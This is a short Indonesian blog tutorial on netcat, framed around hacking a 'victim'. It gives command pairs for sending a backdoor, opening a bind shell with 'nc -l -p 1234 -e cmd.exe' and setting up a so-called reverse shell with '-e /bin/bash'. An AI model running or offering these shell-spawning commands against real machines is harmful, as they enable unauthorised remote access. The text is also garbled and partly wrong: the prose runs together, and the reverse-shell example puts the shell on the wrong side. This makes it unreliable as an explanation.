Netcat adalah sebuah utiliti tool yang digunakan untuk berbagai hal yang berkaitan dengan protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paket­paket UDP, listen pada port ­port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.

Tidak seperti telnet, script nc memisahkan pesan­ error ke standar error daripada ke standar output, sedangkan telnet mengirimkan output dan error ke standar output yang sama.

Biasanya netcat ini digunakan oleh para hacker atau peretas untuk melakukan connect back pada sistem target agar hacker mendapatkan akses root melalui port yg telah di tentukan oleh hacker tersebut.

Netcat salah satu alat yang paling umum digunakan oleh hacker untuk mengeksploitasi sistemIni berjalan pada berbagai sistem termasuk WindowsLinuxSolarisdll Netcat Muncul dipasang di sebagian besar distribusi LinuxSebelum kita menggali lebih dalam kegunaan terkenal Netcatharap perhatikan  






 Netcat Mode:


Netcat dapat beroperasi dalam 2 mode:
  1. Klien Mode : Klien selalu memulai koneksi dengan listener. Semua kesalahan dalam modus klien dimasukkan ke dalam standard error. Dalam modus klienmemerlukan alamat IP dan port dari listener.
  2.  Listener Mode : Dalam mode ini, listener selalu listener untuk koneksi pada port tertentuOutput dapat menjadi output standarmengajukan dll meminta hanya mendengarkan port.

Penggunaan Netcat


Sekarang  mari kita fokus pada subyek utama dari artikel ini kasus penggunaan.

Data Transfer

 Netcat dapat digunakan untuk mentransfer file antara mesin. Netcat bekerja dengan baik TCP dan UDP.Transfer data dapat dilakukan dengan dua cara:
Contoh kita akan mengirim backdoor ke victim dari linux ke windows.

Victim (Windows)   : nc -l -p 6789 > test.txt
Attacker (Linux)      : nc 127.0.0.1 6789 < test.txt
127.0.0.1 : IP Address kita

Membuat Backdoor

 
Netcat paling populer digunakan oleh dari pengguna yang jahat adalah untuk menciptakan sebuah shell loginbackdoor. Script sederhana di bawah ini akan membuat backdoor.
    
Victim (Windows)nc -l -p 1234 -e cmd.exe
Attacker (Linux)   : nc 127.0.0.1 1234


Reverse Shells

Netcat juga dapat digunakan untuk mendorong sesi klien dari klien ke server. Teknik ini disebut reverse shell dengan perintah berikut ini.

Victim (Windows)nc -l -p 1234
Attacker (Linux)   : nc 127.0.0.1 1234 -e /bin/bash

 


1 comments:

 
Cyber Code © 2014. All Rights Reserved. Powered by Blogger
Top